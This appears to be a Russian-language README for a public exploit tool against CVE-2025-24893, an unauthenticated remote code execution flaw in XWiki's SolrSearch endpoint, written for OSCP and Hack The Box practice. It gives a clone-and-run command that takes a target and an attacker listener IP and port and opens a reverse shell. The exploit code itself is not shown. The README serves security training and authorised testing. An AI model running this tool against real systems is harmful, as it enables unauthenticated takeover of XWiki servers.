
Эксплойт в стиле OSCP для CVE-2025-24893 для Linux XWiki
XWiki Platform — это универсальная вики-платформа, предоставляющая сервисы времени выполнения для приложений, построенных на её основе. Из-за уязвимости в конечной точке SolrSearch неаутентифицированный пользователь может выполнить произвольный удалённый код. Эта уязвимость затрагивает конфиденциальность, целостность и доступность всей установки XWiki.
CVE: CVE-2025-24893
Демонстрация работы эксплойта показана ниже:

Чтобы использовать этот эксплойт, выполните следующие шаги:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Этот эксплойт демонстрирует уязвимость удалённого выполнения кода, описанную в CVE-2025-24893, и позволяет неаутентифицированному пользователю получить обратную оболочку (reverse shell) на уязвимых Linux-установках XWiki.
Изначально я разработал этот инструмент для использования в учебных средах, таких как лаборатории подготовки к OSCP и Hack The Box, где мне нужен был простой и надёжный способ воспроизведения уязвимости. Поскольку ни один существующий инструмент не соответствовал моим требованиям, я решил создать свой.
Хотя CVE-2025-24893 уже давно исправлена в поддерживаемых выпусках XWiki, этот эксплойт следует использовать только против систем, которые принадлежат вам или на тестирование которых у вас есть явное разрешение.
Автор не несёт ответственности за любое неправомерное использование этого программного обеспечения или за любой ущерб, причинённый в результате его использования.
Этот инструмент предназначен только для образовательных целей и авторизованных оценок безопасности.
Используйте его только против систем, которые принадлежат вам или на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование этого программного обеспечения или за любой ущерб, причинённый в результате его использования.
Вклад приветствуется.
Если вы обнаружите ошибки, у вас есть предложения по улучшению или вы хотите добавить поддержку дополнительных полезных нагрузок, платформ или функций, не стесняйтесь открывать issue или отправлять pull request.
Конструктивная обратная связь, отчёты о тестировании и вклад в код высоко ценятся.